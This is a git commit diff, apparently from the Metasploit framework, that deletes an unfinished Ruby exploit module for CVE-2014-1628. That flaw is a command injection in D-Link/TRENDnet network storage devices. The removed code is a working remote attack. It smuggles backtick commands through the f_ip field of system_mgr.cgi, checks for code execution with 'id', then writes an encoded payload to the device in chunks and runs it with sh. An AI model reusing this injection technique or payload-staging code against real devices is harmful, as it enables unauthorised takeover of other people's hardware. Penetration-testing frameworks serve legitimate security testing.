remove unrelated module

2015-11-09 18:17:16 -08:00 · 2015-11-09 18:17:16 -08:00 · 0eab2fa98d
parent 15eb135295
commit 0eab2fa98d
1 changed files with 0 additions and 156 deletions
--- a/modules/exploits/linux/http/trendnet_cve-2014-1628.rb
+++ b/modules/exploits/linux/http/trendnet_cve-2014-1628.rb
@ -1,156 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::FileDropper
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'D-Link/TRENDnet NCC Service Command Injection',
-      'Description'    => %q{
-      },
-      'Author'         =>
-        [
-          'Jon Hart <jon_hart[at]rapid7.com>'
-        ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          ['CVE', '2014-1628']
-        ],
-      'Platform'       => ['unix'],
-      'Arch'           => ARCH_CMD,
-      'Privileged'     => false,
-      'Payload'        =>
-        {
-          'EncoderType' => Msf::Encoder::Type::CmdUnixEcho,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl'
-            }
-        },
-      'Targets'        =>
-        [
-          [ 'Automatic', { } ]
-        ],
-#      'Targets'        =>
-#        [
-#          [ 'Linux mipsel Payload',
-#            {
-#            'Arch' => ARCH_MIPSLE,
-#            'Platform' => 'linux',
-#            'EncoderType'   => Msf::Encoder::Type::CmdUnixEcho
-#            }
-#          ],
-#          [ 'Linux mipsbe Payload',
-#            {
-#            'Arch' => ARCH_MIPSBE,
-#            'Platform' => 'linux',
-#            'EncoderType' => Msf::Encoder::Type::CmdUnixEcho
-#            }
-#          ],
-#        ],
-      'DisclosureDate'  => 'Feb 26 2015',
-      'DefaultTarget'   => 0))
-
-    register_options(
-      [
-        OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/cgi-bin/system_mgr.cgi']),
-      ], self.class)
-  end
-
-  MAX_CMD_SIZE = 13
-
-  def check
-    # run id and redirect output to a file we can access remotely.
-    canary_file = Rex::Text.rand_text_alpha(1)
-    exec_command("id>/var/www/#{canary_file}")
-    # snag a copy of the file
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri'    => "/#{canary_file}"
-    })
-    # clean up
-    exec_command("rm /var/www/#{canary_file}")
-
-    if res
-      if res && res.code == 200
-        if res.body =~ /uid=/
-          print_good("Simple code execution possible as #{res.body}")
-          return Exploit::CheckCode::Vulnerable
-        end
-      end
-    end
-
-    return Exploit::CheckCode::Unknown
-  end
-
-  def exec_command(cmd, timeout = 20)
-    if cmd.length > MAX_CMD_SIZE
-      puts "cmd too long"
-    end
-    begin
-      res = send_request_cgi({
-        'method' => 'POST',
-        'uri'    => normalize_uri(target_uri.path),
-        'encode_params' => false,
-        'vars_post' => {
-          'cmd' => 'cgi_log_server',
-          'f_enable' => 1,
-          'f_ip'  => "`#{cmd}`"
-        }
-      }, timeout)
-      return res
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
-    end
-  end
-
-  def exploit
-    print_status("#{peer} - Accessing the vulnerable URL...")
-
-    unless check == Exploit::CheckCode::Vulnerable
-      fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
-    end
-
-    print_status("#{peer} - Exploiting...")
-    payload_path = "/#{Rex::Text.rand_text_numeric(1)}"
-
-    # create an echo wrapper that is smaller
-    vprint_status("Uploading echo wrapper")
-    echo_path = "e"
-#    exec_command("echo -n ech>#{echo_path}")
-#    exec_command("echo -n o>>#{echo_path}")
-#    exec_command("echo -n \\ >>#{echo_path}")
-#    exec_command("echo -n - >>#{echo_path}")
-#    exec_command("echo -n n >>#{echo_path}")
-#    exec_command("echo -n e >>#{echo_path}")
-#    exec_command("echo -n \\ >>#{echo_path}")
-#    exec_command("echo -n $ >>#{echo_path}")
-#    exec_command("echo -n @ >>#{echo_path}")
-#    exec_command("chmod 755 #{echo_path}")
-    # create empty payload file
-    exec_command(">#{payload_path}")
-    redirect = ">>#{payload_path}"
-    echo_cmd = "/#{echo_path} "
-    chunk_size = MAX_CMD_SIZE - (echo_cmd.length + redirect.length)
-    encoded_payload = Rex::Text.to_hex(payload.encoded, "\\\\x")
-    encoded_payload_offset = 0
-    vprint_status("Uploading payload")
-    until (encoded_payload_offset >= encoded_payload.length) do
-      exec_command("#{echo_cmd}#{encoded_payload.slice(encoded_payload_offset, chunk_size)}#{redirect}")
-      encoded_payload_offset += chunk_size
-    end
-
-    puts "Executing #{payload_path}"
-    exec_command("sh #{payload_path}")
-    #exec_command("rm #{payload_path}")
-    return
-  end
-end